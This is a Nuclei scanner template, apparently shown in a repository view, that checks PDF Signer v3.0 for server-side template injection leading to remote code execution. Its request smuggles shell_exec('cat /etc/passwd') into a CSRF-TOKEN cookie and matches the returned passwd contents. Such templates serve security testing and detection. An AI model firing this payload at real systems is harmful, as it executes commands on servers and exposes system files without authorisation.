nuclei-templates/vulnerabilities/pdf-signer-ssti-to-rce.yaml

22 lines
454 B
YAML
Raw Normal View History

id: pdf-signer-ssti-to-rce
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/"
headers:
2020-05-24 22:19:21 +00:00
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
- type: regex
regex:
2020-05-24 22:19:21 +00:00
- "root:[x*]:0:0:"
part: body